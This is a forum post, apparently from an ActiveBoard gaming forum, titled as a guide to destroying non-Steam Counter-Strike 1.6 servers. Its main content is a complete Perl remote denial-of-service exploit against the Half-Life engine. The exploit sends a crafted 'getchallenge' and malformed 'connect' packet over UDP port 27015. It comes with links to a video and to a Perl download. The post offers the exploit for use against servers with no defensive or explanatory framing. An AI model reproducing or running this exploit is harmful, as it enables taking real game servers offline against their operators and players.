Members Login
Username 
 
Password 
    Remember Me  
Post Info TOPIC: how to destroy a counter strike 1.6 (non-steam) server


Administrator

Status: Offline
Posts: 147
Date:
how to destroy a counter strike 1.6 (non-steam) server
Permalink   


how to destroy a counter strike 1.6 (non-steam) server
Kodi:

www.crystygye2006.evonet.ro/gye.avi


program to use:
active perl link download:
Kodi:

http://www.download.com/3001-10249_4-10175376.html


code of exploit:
Kodi:

#!/usr/bin/perl # Server must not be running steam. /str0ke # Half-Life engine remote DoS exploit # bug found by Firestorm # tested against cstrike 1.6 Windows build-in server, cstrike 1.6 linux dedicated server use IO::Socket; die "usage: ./csdos " unless $ARGV[0]; $host=$ARGV[0]; if (fork()) { econnect($host); } else { econnect($host); }; exit; sub econnect($) { my $host=$_[0]; my $sock = new IO::Socket::INET(PeerAddr=>$host,PeerPort=>'27015' ,Proto=>'udp'); die "Could not create socket: $!\n" unless $sock; $cmd="\xff\xff\xff\xff"; syswrite $sock, $cmd."getchallenge"; sysread $sock,$b,65535; print $b,"\n"; @c=split(/ /,$b); $c2=$c[1]; $q=$cmd."connect 47 $c2 \"\\prot\\4\\unique\\0\
aw\\valve\\cdkey\\f0ef8a3 6258af1bb64ed866538c9db76\"\"\\\"\0\0"; print '>',$q,"\n"; syswrite $sock, $q; sysread $sock,$b,65535; print $b,"\n"; sleep 3; close $sock; }

__________________
Page 1 of 1  sorted by
 
Quick Reply

Please log in to post quick replies.

Tweet this page Post to Digg Post to Del.icio.us


Create your own FREE Forum
Report Abuse
Powered by ActiveBoard